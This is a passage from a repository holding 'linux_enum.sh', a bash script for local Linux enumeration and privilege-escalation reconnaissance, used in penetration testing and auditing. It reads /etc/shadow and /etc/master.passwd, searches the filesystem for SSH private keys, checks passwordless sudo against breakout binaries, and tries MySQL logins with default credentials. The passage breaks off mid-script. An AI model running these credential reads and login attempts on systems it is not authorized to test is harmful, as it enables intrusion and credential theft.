| FS_summary 871 | fi 872 | exit 0 873 | ;; 874 | 875 | *) 876 | if [ "$#" != "0" ] ; then 877 | printf "\033[31mError: Unknown option '$1'.\033[m\n\n" 878 | fi 879 | help 880 | exit 1 881 | ;; 882 | esac 883 | -------------------------------------------------------------------------------- /linux_enum.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | #A simple script to enumerate local information from a Linux host 3 | #version 0.3 4 | #@oshearing 5 | #@roo7break (further enhancements) 6 | 7 | #option to store to a file 8 | outfile="$1" 9 | 10 | if [ "$outfile" ]; then 11 | echo -e "#########################################################" >> $outfile 12 | echo -e "Local Linux Enumeration & Privilege Escalation Script" >> $outfile 13 | echo -e "#########################################################" >> $outfile 14 | echo -e "# www.rebootuser.com" >> $outfile 15 | echo -e "# version 0.4" >> $outfile 16 | echo -e "For silent (and clean output) Outfile and keyword(s) can be supplied from the command line:\n" >> $outfile 17 | echo -e "usage ./LinEnum.sh outfile.txt 'keyword1 keyword2'\n" >> $outfile 18 | else 19 | echo -e "\n\e[00;30m#########################################################\e[00m" 20 | echo -e "\e[00;34mLocal Linux Enumeration & Privilege Escalation Script\e[00m" 21 | echo -e "\e[00;30m#########################################################\e[00m" 22 | echo -e "\e[00;30m# www.rebootuser.com\e[00m" 23 | echo -e "\e[00;30m# version 0.4\e[00m\n" 24 | echo -e "\e[00;34mFor silent (and clean output) Outfile and keyword(s) can be supplied from the command line:\e[00m\n" 25 | echo -e "\e[00;34musage ./LinEnum.sh outfile.txt 'keyword1 keyword2'\e[00m\n" 26 | fi 27 | 28 | #enter a single keyword that'll be used to search within *.conf, *.log & *.ini files. 29 | if [ "$outfile" ]; then 30 | echo "Enter keywords (space separated) that'll be used to search in *.conf, *.log and *.ini files (e.g. password cred)" >> $outfile 31 | #accepts search keywords from commandline 32 | keyword="$2" 33 | echo -e "$keyword" >> $outfile 34 | else 35 | echo "Enter keywords (space separated) that'll be used to search in *.conf, *.log and *.ini files (e.g. password cred)" 36 | #accepts search keywords from commandline 37 | read keyword 38 | fi 39 | 40 | who=`whoami` 41 | 42 | if [ "$outfile" ]; then 43 | echo -e "\n" >> $outfile 44 | thedate=`date` 45 | echo -e "Scan started at: $thedate" >> $outfile 46 | echo -e "\n" >> $outfile 47 | else 48 | echo -e "\n" 49 | echo -e "\e[00;30mScan started at:"; date 50 | echo -e "\e[00m\n" 51 | fi 52 | 53 | if [ "$outfile" ]; then 54 | echo -e "### SYSTEM ##############################################" >> $outfile 55 | else 56 | echo -e "\e[00;34m### SYSTEM ##############################################\e[00m" 57 | fi 58 | 59 | unameinfo=`uname -a 2>/dev/null` 60 | 61 | if [ "$outfile" ]; then 62 | if [ "$unameinfo" ]; then 63 | echo -e "Kernel information:\n$unameinfo" >> $outfile 64 | echo -e "\n" >> $outfile 65 | else 66 | : 67 | fi 68 | else 69 | if [ "$unameinfo" ]; then 70 | echo -e "\e[00;31mKernel information:\e[00m\n$unameinfo" 71 | echo -e "\n" 72 | else 73 | : 74 | fi 75 | fi 76 | 77 | procver=`cat /proc/version 2>/dev/null` 78 | 79 | if [ "$outfile" ];then 80 | if [ "$procver" ]; then 81 | echo -e "Kernel information (continued):\n$procver" >> $outfile 82 | echo -e "\n" >> $outfile 83 | else 84 | : 85 | fi 86 | else 87 | if [ "$procver" ]; then 88 | echo -e "\e[00;31mKernel information (continued):\e[00m\n$procver" 89 | echo -e "\n" 90 | else 91 | : 92 | fi 93 | fi 94 | 95 | #search all *-release files for version info 96 | release=`cat /etc/*-release 2>/dev/null` 97 | 98 | if [ "$outfile" ];then 99 | if [ "$release" ]; then 100 | echo -e "Specific release information:\n$release" >> $outfile 101 | echo -e "\n" >> $outfile 102 | else 103 | : 104 | fi 105 | else 106 | if [ "$release" ]; then 107 | echo -e "\e[00;31mSpecific release information:\e[00m\n$release" 108 | echo -e "\n" 109 | else 110 | : 111 | fi 112 | fi 113 | 114 | hostnamed=`hostname 2>/dev/null` 115 | 116 | if [ "$outfile" ];then 117 | if [ "$hostnamed" ]; then 118 | echo -e "Hostname:\n$hostnamed" >> $outfile 119 | echo -e "\n" >> $outfile 120 | else 121 | : 122 | fi 123 | else 124 | if [ "$hostnamed" ]; then 125 | echo -e "\e[00;31mHostname:\e[00m\n$hostnamed" 126 | echo -e "\n" 127 | else 128 | : 129 | fi 130 | fi 131 | 132 | if [ "$outfile" ]; then 133 | echo -e "### USER/GROUP ##########################################" >> $outfile 134 | else 135 | echo -e "\e[00;34m### USER/GROUP ##########################################\e[00m" 136 | fi 137 | 138 | currusr=`id 2>/dev/null` 139 | if [ "$outfile" ]; then 140 | if [ "$currusr" ]; then 141 | echo -e "Current user/group info:\n$currusr" >> $outfile 142 | echo -e "\n" >> $outfile 143 | else 144 | : 145 | fi 146 | else 147 | if [ "$currusr" ]; then 148 | echo -e "\e[00;31mCurrent user/group info:\e[00m\n$currusr" 149 | echo -e "\n" 150 | else 151 | : 152 | fi 153 | fi 154 | 155 | grpinfo=`getent group $who 2>/dev/null` 156 | if [ "$outfile" ];then 157 | if [ "$grpinfo" ]; then 158 | echo -e "All members of 'our' group(s):\n$grpinfo" >> $outfile 159 | echo -e "\n" >> $outfile 160 | else 161 | : 162 | fi 163 | else 164 | if [ "$grpinfo" ]; then 165 | echo -e "\e[00;31mAll members of 'our' group(s):\e[00m\n$grpinfo" 166 | echo -e "\n" 167 | else 168 | : 169 | fi 170 | fi 171 | 172 | lastlogedonusrs=`lastlog |grep -v "Never" 2>/dev/null` 173 | if [ "$outfile" ];then 174 | if [ "$lastlogedonusrs" ]; then 175 | echo -e "Users that have previously logged onto the system:\n$lastlogedonusrs" >> $outfile 176 | echo -e "\n" >> $outfile 177 | else 178 | : 179 | fi 180 | else 181 | if [ "$lastlogedonusrs" ]; then 182 | echo -e "\e[00;31mUsers that have previously logged onto the system:\e[00m\n$lastlogedonusrs" 183 | echo -e "\n" 184 | else 185 | : 186 | fi 187 | fi 188 | 189 | usrsinfo=`cat /etc/passwd | cut -d ":" -f 1,2,3,4 2>/dev/null` 190 | if [ "$outfile" ];then 191 | if [ "$usrsinfo" ]; then 192 | echo -e "All users and uid/gid info:\n$usrsinfo" >> $outfile 193 | echo -e "\n" >> $outfile 194 | else 195 | : 196 | fi 197 | else 198 | if [ "$usrsinfo" ]; then 199 | echo -e "\e[00;31mAll users and uid/gid info:\e[00m\n$usrsinfo" 200 | echo -e "\n" 201 | else 202 | : 203 | fi 204 | fi 205 | 206 | hashesinpasswd=`grep -v '^[^:]*:[x]' /etc/passwd 2>/dev/null` 207 | if [ "$outfile" ]; then 208 | if [ "$hashesinpasswd" ]; then 209 | echo -e "It looks like we have password hashes in /etc/passwd!\n$hashesinpasswd" >> $outfile 210 | echo -e "\n" >> $outfile 211 | else 212 | : 213 | fi 214 | else 215 | if [ "$hashesinpasswd" ]; then 216 | echo -e "\e[00;33mIt looks like we have password hashes in /etc/passwd!\e[00m\n$hashesinpasswd" 217 | echo -e "\n" 218 | else 219 | : 220 | fi 221 | fi 222 | 223 | #locate custom user accounts with some 'known default' uids 224 | readpasswd=`grep -v "^#" /etc/passwd | awk -F: '$3 == 0 || $3 == 500 || $3 == 501 || $3 == 502 || $3 == 1000 || $3 == 1001 || $3 == 1002 || $3 == 2000 || $3 == 2001 || $3 == 2002 { print }'` 225 | if [ "$outfile" ]; then 226 | if [ "$readpasswd" ]; then 227 | echo -e "Sample entires from /etc/passwd (searching for uid values 0, 500, 501, 502, 1000, 1001, 1002, 2000, 2001, 2002):\n$readpasswd" >> $outfile 228 | echo -e "\n" >> $outfile 229 | else 230 | : 231 | fi 232 | else 233 | if [ "$readpasswd" ]; then 234 | echo -e "\e[00;31mSample entires from /etc/passwd (searching for uid values 0, 500, 501, 502, 1000, 1001, 1002, 2000, 2001, 2002):\e[00m\n$readpasswd" 235 | echo -e "\n" 236 | else 237 | : 238 | fi 239 | fi 240 | 241 | readshadow=`cat /etc/shadow 2>/dev/null` 242 | if [ "$outfile" ]; then 243 | if [ "$readshadow" ]; then 244 | echo -e "***We can read the shadow file!\n$readshadow" >> $outfile 245 | echo -e "\n" >> $outfile 246 | else 247 | : 248 | fi 249 | else 250 | if [ "$readshadow" ]; then 251 | echo -e "\e[00;33m***We can read the shadow file!\e[00m\n$readshadow" 252 | echo -e "\n" 253 | else 254 | : 255 | fi 256 | fi 257 | 258 | readmasterpasswd=`cat /etc/master.passwd 2>/dev/null` 259 | if [ "$outfile" ]; then 260 | if [ "$readmasterpasswd" ]; then 261 | echo -e "***We can read the master.passwd file!\n$readmasterpasswd" >> $outfile 262 | echo -e "\n" >> $outfile 263 | else 264 | : 265 | fi 266 | else 267 | if [ "$readmasterpasswd" ]; then 268 | echo -e "\e[00;33m***We can read the master.passwd file!\e[00m\n$readmasterpasswd" 269 | echo -e "\n" 270 | else 271 | : 272 | fi 273 | fi 274 | 275 | #all root accounts (uid 0) 276 | if [ "$outfile" ]; then 277 | echo -e "Super user account(s):" >> $outfile; grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1 }' >> $outfile 278 | echo -e "\n" >> $outfile 279 | else 280 | echo -e "\e[00;31mSuper user account(s):\e[00m"; grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' 281 | echo -e "\n" 282 | fi 283 | 284 | #pull out vital sudoers info 285 | sudoers=`cat /etc/sudoers 2>/dev/null` 286 | if [ "$outfile" ]; then 287 | if [ "$sudoers" ]; then 288 | echo -e "Sudoers configuration:" >> $outfile; cat /etc/sudoers 2>/dev/null | grep -A 1 "User priv" >> $outfile; cat /etc/sudoers | grep -A 1 "Allow" >> $outfile 289 | echo -e "\n" >> $outfile 290 | else 291 | : 292 | fi 293 | else 294 | if [ "$sudoers" ]; then 295 | echo -e "\e[00;31mSudoers configuration:\e[00m"; cat /etc/sudoers 2>/dev/null | grep -A 1 "User priv"; cat /etc/sudoers | grep -A 1 "Allow" 296 | echo -e "\n" 297 | else 298 | : 299 | fi 300 | fi 301 | 302 | #can we sudo without supplying a password 303 | sudoperms=`echo '' | sudo -S -l 2>/dev/null` 304 | if [ "$outfile" ]; then 305 | if [ "$sudoperms" ]; then 306 | echo -e "We can sudo without supplying a password!\n$sudoperms" >> $outfile 307 | echo -e "\n" >> $outfile 308 | else 309 | : 310 | fi 311 | else 312 | if [ "$sudoperms" ]; then 313 | echo -e "\e[00;33mWe can sudo without supplying a password!\e[00m\n$sudoperms" 314 | echo -e "\n" 315 | else 316 | : 317 | fi 318 | fi 319 | 320 | #known 'good' breakout binaries 321 | sudopwnage=`echo '' | sudo -S -l 2>/dev/null | grep -w 'nmap\|perl\|'awk'\|'find'\|'bash'\|'sh'\|'man'\|'more'\|'less'\|'vi'\|'vim'\|'nc'\|'netcat'\|python\|ruby\|lua\|irb' | xargs -r ls -la 2>/dev/null` 322 | if [ "$outfile" ]; then 323 | if [ "$sudopwnage" ]; then 324 | echo -e "***Possible Sudo PWNAGE!\n$sudopwnage" >> $outfile 325 | echo -e "\n" >> $outfile 326 | else 327 | : 328 | fi 329 | else 330 | if [ "$sudopwnage" ]; then 331 | echo -e "\e[00;33m***Possible Sudo PWNAGE!\e[00m\n$sudopwnage" 332 | echo -e "\n" 333 | else 334 | : 335 | fi 336 | fi 337 | 338 | rthmdir=`ls -ahl /root/ 2>/dev/null` 339 | if [ "$outfile" ]; then 340 | if [ "$rthmdir" ]; then 341 | echo -e "***We can read root's home directory!\n$rthmdir" >> $outfile 342 | echo -e "\n" >> $outfile 343 | else 344 | : 345 | fi 346 | else 347 | if [ "$rthmdir" ]; then 348 | echo -e "\e[00;33m***We can read root's home directory!\e[00m\n$rthmdir" 349 | echo -e "\n" 350 | else 351 | : 352 | fi 353 | fi 354 | 355 | homedirperms=`ls -ahl /home/ 2>/dev/null` 356 | if [ "$outfile" ]; then 357 | if [ "$homedirperms" ]; then 358 | echo -e "Are permissions on /home directories lax:\n$homedirperms" >> $outfile 359 | echo -e "\n" >> $outfile 360 | else 361 | : 362 | fi 363 | else 364 | if [ "$homedirperms" ]; then 365 | echo -e "\e[00;31mAre permissions on /home directories lax:\e[00m\n$homedirperms" 366 | echo -e "\n" 367 | else 368 | : 369 | fi 370 | fi 371 | 372 | wrfileshm=`find /home/ -perm -4 -type f -exec ls -al {} \; 2>/dev/null` 373 | if [ "$outfile" ]; then 374 | if [ "$wrfileshm" ]; then 375 | echo -e "World-readable files within /home:\n$wrfileshm" >> $outfile 376 | echo -e "\n" >> $outfile 377 | else 378 | : 379 | fi 380 | else 381 | if [ "$wrfileshm" ]; then 382 | echo -e "\e[00;31mWorld-readable files within /home:\e[00m\n$wrfileshm" 383 | echo -e "\n" 384 | else 385 | : 386 | fi 387 | fi 388 | 389 | homedircontents=`ls -ahl ~ 2>/dev/null` 390 | if [ "$outfile" ]; then 391 | if [ "$homedircontents" ]; then 392 | echo -e "Home directory contents:\n$homedircontents" >> $outfile 393 | echo -e "\n" >> $outfile 394 | else 395 | : 396 | fi 397 | else 398 | if [ "$homedircontents" ]; then 399 | echo -e "\e[00;31mHome directory contents:\e[00m\n$homedircontents" 400 | echo -e "\n" 401 | else 402 | : 403 | fi 404 | fi 405 | 406 | sshfiles=`find / -name "id_dsa*" -o -name "id_rsa*" -o -name "known_hosts" -o -name "authorized_hosts" -o -name "authorized_keys" 2>/dev/null |xargs -r ls -la` 407 | if [ "$outfile" ];then 408 | if [ "$sshfiles" ]; then 409 | echo -e "SSH keys/host information found in the following locations:\n$sshfiles" >> $outfile 410 | echo -e "\n" >> $outfile 411 | else 412 | : 413 | fi 414 | else 415 | if [ "$sshfiles" ]; then 416 | echo -e "\e[00;31mSSH keys/host information found in the following locations:\e[00m\n$sshfiles" 417 | echo -e "\n" 418 | else 419 | : 420 | fi 421 | fi 422 | 423 | sshrootlogin=`grep "PermitRootLogin " /etc/ssh/sshd_config 2>/dev/null | grep -v "#" | awk '{print $2}'` 424 | if [ "$outfile" ]; then 425 | if [ "$sshrootlogin" = "yes" ]; then 426 | echo -e "Root is allowed to login via SSH:" >> $outfile; grep "PermitRootLogin " /etc/ssh/sshd_config 2>/dev/null | grep -v "#" >> $outfile 427 | echo -e "\n" >> $outfile 428 | else 429 | : 430 | fi 431 | else 432 | if [ "$sshrootlogin" = "yes" ]; then 433 | echo -e "\e[00;31mRoot is allowed to login via SSH:\e[00m"; grep "PermitRootLogin " /etc/ssh/sshd_config 2>/dev/null | grep -v "#" 434 | echo -e "\n" 435 | else 436 | : 437 | fi 438 | fi 439 | 440 | if [ "$outfile" ]; then 441 | echo -e "### ENVIRONMENTAL #######################################" >> $outfile 442 | else 443 | echo -e "\e[00;34m### ENVIRONMENTAL #######################################\e[00m" 444 | fi 445 | 446 | pathinfo=`echo $PATH 2>/dev/null` 447 | if [ "$outfile" ]; then 448 | if [ "$pathinfo" ]; then 449 | echo -e "Path information:\n$pathinfo" >> $outfile 450 | echo -e "\n" >> $outfile 451 | else 452 | : 453 | fi 454 | else 455 | if [ "$pathinfo" ]; then 456 | echo -e "\e[00;31mPath information:\e[00m\n$pathinfo" 457 | echo -e "\n" 458 | else 459 | : 460 | fi 461 | fi 462 | 463 | shellinfo=`cat /etc/shells 2>/dev/null` 464 | if [ "$outfile" ]; then 465 | if [ "$shellinfo" ]; then 466 | echo -e "Available shells:\n$shellinfo" >> $outfile 467 | echo -e "\n" >> $outfile 468 | else 469 | : 470 | fi 471 | else 472 | if [ "$shellinfo" ]; then 473 | echo -e "\e[00;31mAvailable shells:\e[00m\n$shellinfo" 474 | echo -e "\n" 475 | else 476 | : 477 | fi 478 | fi 479 | 480 | if [ "$outfile" ]; then 481 | echo -e "### JOBS/TASKS ##########################################" >> $outfile 482 | else 483 | echo -e "\e[00;34m### JOBS/TASKS ##########################################\e[00m" 484 | fi 485 | 486 | cronjobs=`ls -la /etc/cron* 2>/dev/null` 487 | if [ "$outfile" ]; then 488 | if [ "$cronjobs" ]; then 489 | echo -e "Cron jobs:\n$cronjobs" >> $outfile 490 | echo -e "\n" >> $outfile 491 | else 492 | : 493 | fi 494 | else 495 | if [ "$cronjobs" ]; then 496 | echo -e "\e[00;31mCron jobs:\e[00m\n$cronjobs" 497 | echo -e "\n" 498 | else 499 | : 500 | fi 501 | fi 502 | 503 | cronjobwwperms=`find /etc/cron* -perm -0002 -exec ls -la {} \; -exec cat {} 2>/dev/null \;` 504 | if [ "$outfile" ]; then 505 | if [ "$cronjobwwperms" ]; then 506 | echo -e "***World-writable cron jobs and file contents:\n$cronjobwwperms" >> $outfile 507 | echo -e "\n" >> $outfile 508 | else 509 | : 510 | fi 511 | else 512 | if [ "$cronjobwwperms" ]; then 513 | echo -e "\e[00;33m***World-writable cron jobs and file contents:\e[00m\n$cronjobwwperms" 514 | echo -e "\n" 515 | else 516 | : 517 | fi 518 | fi 519 | 520 | crontab=`cat /etc/crontab 2>/dev/null` 521 | if [ "$outfile" ]; then 522 | if [ "$crontab" ]; then 523 | echo -e "Crontab contents:\n$crontab" >> $outfile 524 | echo -e "\n" >> $outfile 525 | else 526 | : 527 | fi 528 | else 529 | if [ "$crontab" ]; then 530 | echo -e "\e[00;31mCrontab contents:\e[00m\n$crontab" 531 | echo -e "\n" 532 | else 533 | : 534 | fi 535 | fi 536 | 537 | cronallowdeny=`ls -la /etc/cron.allow 2>/dev/null && cat /etc/cron.allow 2>/dev/null; ls -la /etc/cron.deny 2>/dev/null && cat /etc/cron.deny 2>/dev/null` 538 | if [ "$outfile" ]; then 539 | if [ "$cronallowdeny" ]; then 540 | echo -e "Cron Alloy/Deny entries:\n$cronallowdeny" >> $outfile 541 | echo -e "\n" >> $outfile 542 | else 543 | : 544 | fi 545 | else 546 | if [ "$cronallowdeny" ]; then 547 | echo -e "\e[00;31mCron Alloy/Deny entries:\e[00m\n$cronallowdeny" 548 | echo -e "\n" 549 | else 550 | : 551 | fi 552 | fi 553 | 554 | crontabvar=`ls -la /var/spool/cron/crontabs 2>/dev/null` 555 | if [ "$outfile" ]; then 556 | if [ "$crontabvar" ]; then 557 | echo -e "Anything interesting in /var/spool/cron/crontabs:\n$crontabvar" >> $outfile 558 | echo -e "\n" >> $outfile 559 | else 560 | : 561 | fi 562 | else 563 | if [ "$crontabvar" ]; then 564 | echo -e "\e[00;31mAnything interesting in /var/spool/cron/crontabs:\e[00m\n$crontabvar" 565 | echo -e "\n" 566 | else 567 | : 568 | fi 569 | fi 570 | 571 | anacronjobs=`ls -la /etc/anacrontab 2>/dev/null; cat /etc/anacrontab 2>/dev/null` 572 | if [ "$outfile" ]; then 573 | if [ "$anacronjobs" ]; then 574 | echo -e "Anacron jobs and associated file permissions:\n$anacronjobs" >> $outfile 575 | echo -e "\n" >> $outfile 576 | else 577 | : 578 | fi 579 | else 580 | if [ "$anacronjobs" ]; then 581 | echo -e "\e[00;31mAnacron jobs and associated file permissions:\e[00m\n$anacronjobs" 582 | echo -e "\n" 583 | else 584 | : 585 | fi 586 | fi 587 | 588 | anacrontab=`ls -la /var/spool/anacron 2>/dev/null` 589 | if [ "$outfile" ]; then 590 | if [ "$anacrontab" ]; then 591 | echo -e "When were jobs last executed (/var/spool/anacron contents):\n$anacrontab" >> $outfile 592 | echo -e "\n" >> $outfile 593 | else 594 | : 595 | fi 596 | else 597 | if [ "$anacrontab" ]; then 598 | echo -e "\e[00;31mWhen were jobs last executed (/var/spool/anacron contents):\e[00m\n$anacrontab" 599 | echo -e "\n" 600 | else 601 | : 602 | fi 603 | fi 604 | 605 | #pull out account names from /etc/passwd and see if any users have associated cronjobs (priv command) 606 | cronother=`cat /etc/passwd | cut -d ":" -f 1 | xargs -n1 crontab -l -u 2>/dev/null` 607 | if [ "$outfile" ]; then 608 | if [ "$cronother" ]; then 609 | echo -e "Jobs held by all users:\n$cronother" >> $outfile 610 | echo -e "\n" >> $outfile 611 | else 612 | : 613 | fi 614 | else 615 | if [ "$cronother" ]; then 616 | echo -e "\e[00;31mJobs held by all users:\e[00m\n$cronother" 617 | echo -e "\n" 618 | else 619 | : 620 | fi 621 | fi 622 | 623 | if [ "$outfile" ]; then 624 | echo -e "### NETWORKING ##########################################" >> $outfile 625 | else 626 | echo -e "\e[00;34m### NETWORKING ##########################################\e[00m" 627 | fi 628 | 629 | nicinfo=`/sbin/ifconfig -a 2>/dev/null` 630 | if [ "$outfile" ]; then 631 | if [ "$nicinfo" ]; then 632 | echo -e "Network & IP info:\n$nicinfo" >> $outfile 633 | echo -e "\n" >> $outfile 634 | else 635 | : 636 | fi 637 | else 638 | if [ "$nicinfo" ]; then 639 | echo -e "\e[00;31mNetwork & IP info:\e[00m\n$nicinfo" 640 | echo -e "\n" 641 | else 642 | : 643 | fi 644 | fi 645 | 646 | nsinfo=`cat /etc/resolv.conf 2>/dev/null | grep "nameserver"` 647 | if [ "$outfile" ]; then 648 | if [ "$nsinfo" ]; then 649 | echo -e "Nameserver(s):\n$nsinfo" >> $outfile 650 | echo -e "\n" >> $outfile 651 | else 652 | : 653 | fi 654 | else 655 | if [ "$nsinfo" ]; then 656 | echo -e "\e[00;31mNameserver(s):\e[00m\n$nsinfo" 657 | echo -e "\n" 658 | else 659 | : 660 | fi 661 | fi 662 | 663 | defroute=`route 2>/dev/null | grep default` 664 | if [ "$outfile" ]; then 665 | if [ "$defroute" ]; then 666 | echo -e "Default route:\n$defroute" >> $outfile 667 | echo -e "\n" >> $outfile 668 | else 669 | : 670 | fi 671 | else 672 | if [ "$defroute" ]; then 673 | echo -e "\e[00;31mDefault route:\e[00m\n$defroute" 674 | echo -e "\n" 675 | else 676 | : 677 | fi 678 | fi 679 | 680 | tcpservs=`netstat -antp 2>/dev/null` 681 | if [ "$outfile" ]; then 682 | if [ "$tcpservs" ]; then 683 | echo -e "Listening TCP:\n$tcpservs" >> $outfile 684 | echo -e "\n" >> $outfile 685 | else 686 | : 687 | fi 688 | else 689 | if [ "$tcpservs" ]; then 690 | echo -e "\e[00;31mListening TCP:\e[00m\n$tcpservs" 691 | echo -e "\n" 692 | else 693 | : 694 | fi 695 | fi 696 | 697 | udpservs=`netstat -anup 2>/dev/null` 698 | if [ "$outfile" ]; then 699 | if [ "$udpservs" ]; then 700 | echo -e "Listening UDP:\n$udpservs" >> $outfile 701 | echo -e "\n" >> $outfile 702 | else 703 | : 704 | fi 705 | else 706 | if [ "$udpservs" ]; then 707 | echo -e "\e[00;31mListening UDP:\e[00m\n$udpservs" 708 | echo -e "\n" 709 | else 710 | : 711 | fi 712 | fi 713 | 714 | if [ "$outfile" ]; then 715 | echo -e "### SERVICES #############################################" >> $outfile 716 | else 717 | echo -e "\e[00;34m### SERVICES #############################################\e[00m" 718 | fi 719 | 720 | psaux=`ps aux 2>/dev/null` 721 | if [ "$outfile" ]; then 722 | if [ "$psaux" ]; then 723 | echo -e "Running processes:\n$psaux" >> $outfile 724 | echo -e "\n" >> $outfile 725 | else 726 | : 727 | fi 728 | else 729 | if [ "$psaux" ]; then 730 | echo -e "\e[00;31mRunning processes:\e[00m\n$psaux" 731 | echo -e "\n" 732 | else 733 | : 734 | fi 735 | fi 736 | 737 | #lookup process binary path and permissisons 738 | procperm=`ps aux | awk '{print $11}'|xargs -r ls -la 2>/dev/null |awk '!x[$0]++'` 739 | if [ "$outfile" ]; then 740 | if [ "$procperm" ]; then 741 | echo -e "Process binaries & associated permissions (from above list):\n$procperm" >> $outfile 742 | echo -e "\n" >> $outfile 743 | else 744 | : 745 | fi 746 | else 747 | if [ "$procperm" ]; then 748 | echo -e "\e[00;31mProcess binaries & associated permissions (from above list):\e[00m\n$procperm" 749 | echo -e "\n" 750 | else 751 | : 752 | fi 753 | fi 754 | 755 | inetdread=`cat /etc/inetd.conf 2>/dev/null` 756 | if [ "$outfile" ]; then 757 | if [ "$inetdread" ]; then 758 | echo -e "Contents of /etc/inetd.conf:\n$inetdread" >> $outfile 759 | echo -e "\n" >> $outfile 760 | else 761 | : 762 | fi 763 | else 764 | if [ "$inetdread" ]; then 765 | echo -e "\e[00;31mContents of /etc/inetd.conf:\e[00m\n$inetdread" 766 | echo -e "\n" 767 | else 768 | : 769 | fi 770 | fi 771 | 772 | #very 'rough' command to extract associated binaries from inetd.conf & show permisisons of each 773 | inetdbinperms=`cat /etc/inetd.conf 2>/dev/null | awk '{print $7}' |xargs -r ls -la 2>/dev/null` 774 | if [ "$outfile" ]; then 775 | if [ "$inetdbinperms" ]; then 776 | echo -e "The related inetd binary permissions:\n$inetdbinperms" >> $outfile 777 | echo -e "\n" >> $outfile 778 | else 779 | : 780 | fi 781 | else 782 | if [ "$inetdbinperms" ]; then 783 | echo -e "\e[00;31mThe related inetd binary permissions:\e[00m\n$inetdbinperms" 784 | echo -e "\n" 785 | else 786 | : 787 | fi 788 | fi 789 | 790 | xinetdread=`cat /etc/xinetd.conf 2>/dev/null` 791 | if [ "$outfile" ]; then 792 | if [ "$xinetdread" ]; then 793 | echo -e "Contents of /etc/xinetd.conf:\n$xinetdread" >> $outfile 794 | echo -e "\n" >> $outfile 795 | else 796 | : 797 | fi 798 | else 799 | if [ "$xinetdread" ]; then 800 | echo -e "\e[00;31mContents of /etc/xinetd.conf:\e[00m\n$xinetdread" 801 | echo -e "\n" 802 | else 803 | : 804 | fi 805 | fi 806 | 807 | xinetdincd=`cat /etc/xinetd.conf 2>/dev/null |grep "/etc/xinetd.d" 2>/dev/null` 808 | if [ "$outfile" ]; then 809 | if [ "$xinetdincd" ]; then 810 | echo -e "/etc/xinetd.d is included in /etc/xinetd.conf - associated binary permissions are listed below:"; ls -la /etc/xinetd.d 2>/dev/null >> $outfile 811 | echo -e "\n" >> $outfile 812 | else 813 | : 814 | fi 815 | else 816 | if [ "$xinetdincd" ]; then 817 | echo -e "\e[00;31m/etc/xinetd.d is included in /etc/xinetd.conf - associated binary permissions are listed below:\e[00m"; ls -la /etc/xinetd.d 2>/dev/null 818 | echo -e "\n" 819 | else 820 | : 821 | fi 822 | fi 823 | 824 | #very 'rough' command to extract associated binaries from xinetd.conf & show permisisons of each 825 | xinetdbinperms=`cat /etc/xinetd.conf 2>/dev/null | awk '{print $7}' |xargs -r ls -la 2>/dev/null` 826 | if [ "$outfile" ]; then 827 | if [ "$xinetdbinperms" ]; then 828 | echo -e "The related xinetd binary permissions:$xinetdbinperms"; >> $outfile 829 | echo -e "\n" >> $outfile 830 | else 831 | : 832 | fi 833 | else 834 | if [ "$xinetdbinperms" ]; then 835 | echo -e "\e[00;31mThe related xinetd binary permissions:\e[00m\n$xinetdbinperms"; 836 | echo -e "\n" 837 | else 838 | : 839 | fi 840 | fi 841 | 842 | initdread=`ls -la /etc/init.d 2>/dev/null` 843 | if [ "$outfile" ]; then 844 | if [ "$initdread" ]; then 845 | echo -e "/etc/init.d/ binary permissions:\n$initdread" >> $outfile 846 | echo -e "\n" >> $outfile 847 | else 848 | : 849 | fi 850 | else 851 | if [ "$initdread" ]; then 852 | echo -e "\e[00;31m/etc/init.d/ binary permissions:\e[00m\n$initdread" 853 | echo -e "\n" 854 | else 855 | : 856 | fi 857 | fi 858 | 859 | rcdread=`ls -la /etc/rc.d/init.d 2>/dev/null` 860 | if [ "$outfile" ]; then 861 | if [ "$rcdread" ]; then 862 | echo -e "/etc/rc.d/init.d binary permissions:\n$rcdread" >> $outfile 863 | echo -e "\n" >> $outfile 864 | else 865 | : 866 | fi 867 | else 868 | if [ "$rcdread" ]; then 869 | echo -e "\e[00;31m/etc/rc.d/init.d binary permissions:\e[00m\n$rcdread" 870 | echo -e "\n" 871 | else 872 | : 873 | fi 874 | fi 875 | 876 | usrrcdread=`ls -la /usr/local/etc/rc.d 2>/dev/null` 877 | if [ "$outfile" ]; then 878 | if [ "$usrrcdread" ]; then 879 | echo -e "/usr/local/etc/rc.d binary permissions:\n$usrrcdread" >> $outfile 880 | echo -e "\n" >> $outfile 881 | else 882 | : 883 | fi 884 | else 885 | if [ "$usrrcdread" ]; then 886 | echo -e "\e[00;31m/usr/local/etc/rc.d binary permissions:\e[00m\n$usrrcdread" 887 | echo -e "\n" 888 | else 889 | : 890 | fi 891 | fi 892 | 893 | if [ "$outfile" ]; then 894 | echo -e "### SOFTWARE #############################################" >> $outfile 895 | else 896 | echo -e "\e[00;34m### SOFTWARE #############################################\e[00m" 897 | fi 898 | 899 | sudover=`sudo -V | grep "Sudo version" 2>/dev/null` 900 | if [ "$outfile" ]; then 901 | if [ "$sudover" ]; then 902 | echo -e "Sudo version:\n$sudover" >> $outfile 903 | echo -e "\n" >> $outfile 904 | else 905 | : 906 | fi 907 | else 908 | if [ "$sudover" ]; then 909 | echo -e "\e[00;31mSudo version:\e[00m\n$sudover" 910 | echo -e "\n" 911 | else 912 | : 913 | fi 914 | fi 915 | 916 | mysqlver=`mysql --version 2>/dev/null` 917 | if [ "$outfile" ]; then 918 | if [ "$mysqlver" ]; then 919 | echo -e "MYSQL version:\n$mysqlver" >> $outfile 920 | echo -e "\n" >> $outfile 921 | else 922 | : 923 | fi 924 | else 925 | if [ "$mysqlver" ]; then 926 | echo -e "\e[00;31mMYSQL version:\e[00m\n$mysqlver" 927 | echo -e "\n" 928 | else 929 | : 930 | fi 931 | fi 932 | 933 | mysqlconnect=`mysqladmin -uroot -proot version 2>/dev/null` 934 | if [ "$outfile" ]; then 935 | if [ "$mysqlconnect" ]; then 936 | echo -e "***We can connect to the local MYSQL service with default root/root credentials!\n$mysqlconnect" >> $outfile 937 | echo -e "\n" >> $outfile 938 | else 939 | : 940 | fi 941 | else 942 | if [ "$mysqlconnect" ]; then 943 | echo -e "\e[00;33m***We can connect to the local MYSQL service with default root/root credentials!\e[00m\n$mysqlconnect" 944 | echo -e "\n" 945 | else 946 | : 947 | fi 948 | fi 949 | 950 | mysqlconnectnopass=`mysqladmin -uroot version 2>/dev/null` 951 | if 